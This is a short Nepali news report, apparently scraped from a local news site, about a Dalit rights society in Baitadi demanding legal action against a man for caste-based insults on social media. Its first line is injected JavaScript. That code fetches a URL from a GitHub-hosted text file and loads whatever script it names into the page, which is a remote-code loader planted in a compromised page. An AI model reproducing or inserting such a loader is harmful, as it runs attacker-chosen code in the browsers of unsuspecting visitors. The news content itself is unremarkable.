;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, महेन्द्रनगर ।
नेपाल उत्पीडित जातीय मुक्ति समाज बैतडीले पञ्चेश्वर गाउँपालिका वडा नं ४ का प्रकाश चन्दलाई कानुनी कारवाही गर्न माग गरेको छ ।
पञ्चेश्वरका चन्दले मेलौली नगरपालिका ५ का वडा अध्यक्ष एवम् मुक्ति समाजका केन्द्रीय सदस्य बलभद्र दयाललाई सामाजिक सञ्जालबाट जातीय विभेद गरी अपमानित गरेकाले कारवाहीको माग गरिएको छ ।
मुक्ति समाजले आइतबार विज्ञप्ति जारी गर्दै चन्दलाई जातीय विभेद तथा छुवाछुत कसुर सम्बन्धी कानुन अनुसार कारवाही गर्न माग गरेको छ ।
फेसबुक प्रतिक्रियाहरु